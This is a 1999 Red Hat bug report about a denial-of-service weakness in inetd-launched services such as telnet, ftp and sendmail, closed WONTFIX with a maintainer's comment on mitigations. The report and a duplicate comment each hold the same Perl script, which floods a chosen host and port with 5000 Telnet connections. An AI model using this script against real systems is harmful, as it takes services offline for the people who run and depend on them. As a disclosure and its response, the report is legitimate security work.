Bug 4005 - inetd D-O-S exploit
inetd D-O-S exploit
Status: CLOSED WONTFIX
Product: Red Hat Linux
Classification: Retired
Component: netkit-base (Show other bugs)
6.0
i386 Linux
high Severity high
: ---
: ---
Assigned To: Cristian Gafton
:
: 4004 (view as bug list)
Depends On:
Blocks:
  Show dependency treegraph
 
Reported: 1999-07-12 18:40 EDT by jjuarez
Modified: 2008-05-01 11:37 EDT (History)
1 user (show)

See Also:
Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 1999-07-28 03:53:42 EDT
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---


Attachments (Terms of Use)

  None (edit)
Description jjuarez 1999-07-12 18:40:49 EDT
#!/usr/bin/perl
# Author: Jesus A. Juarez
#         Jul 1999
# e-mail: chuby@mail.com
# The Xploit attack to services under inetd daemon on the
# Linux  Box's, this cause the suspend of the services.
# The problem is on the inetd, telnet, ftp & sendmail, etc;
# daemon's, because this programs do not limit the number of
# calls by client. This causes that the service requested
# became down.
# Use it under your own risk.
# The TCP-WRAPPERS don't Fix this problem.
# Sintax:
#               DoS-TFS.pl <hostname> <port> <enter>
#               DoS-Telnet, FTP, Sendmail, etc.
# This code has beed tested from Linux to Linux Box's whith
# Perl  installed, I think'  that it run the same way on
# some Unix's or Windows System to damage some Linux Box's.
use Net::Telnet;
for ($i=0;$i<5000;$i++)
{
  $obj=Net::Telnet->new( Host => "$ARGV[0]",Port >
"$ARGV[1]");
  my $cmd = ".";
  $obj->print("$cmd");
  $obj->close;
}
#this problem will not be published.
# please notify me, when fix it. :)
Comment 1 Bill Nottingham 1999-07-13 10:22:59 EDT
*** Bug 4004 has been marked as a duplicate of this bug. ***

#!/usr/bin/perl
# Author: Jesus A. Juarez
#         Jul 1999
# e-mail: chuby@mail.com
# The Xploit attack to services under inetd daemon on the
# Linux  Box's, this cause the suspend of the services.
# The problem is on the inetd, telnet, ftp & sendmail, etc;
# daemon's, because this programs do not limit the number of
# calls by client. This causes that the service requested
# became down.
# Use it under your own risk.
# The TCP-WRAPPERS don't Fix this problem.
# Sintax:
#               DoS-TFS.pl <hostname> <port> <enter>
#               DoS-Telnet, FTP, Sendmail, etc.
# This code has beed tested from Linux to Linux Box's whith
# Perl  installed, I think'  that it run the same way on
# some Unix's or Windows System to damage some Linux Box's.
use Net::Telnet;
for ($i=0;$i<5000;$i++)
{
  $obj=Net::Telnet->new( Host => "$ARGV[0]",Port >
"$ARGV[1]");
  my $cmd = ".";
  $obj->print("$cmd");
  $obj->close;
}
#this problem will not be published.
# please notify me, when fix it. :)
Comment 2 Cristian Gafton 1999-07-28 03:53:59 EDT
inetd will shut down the services that are being over-used or come
under heavy network activity. One can use the wait/nowait.N to limit
the number of spawns for that service to N per second, but that is not
a effective protection against these types of attacks.

The kernel SYn cookies will also help here, but the only effective way
of protection is firewalling off the attacker.

Note You need to log in before you can comment on or make changes to this bug.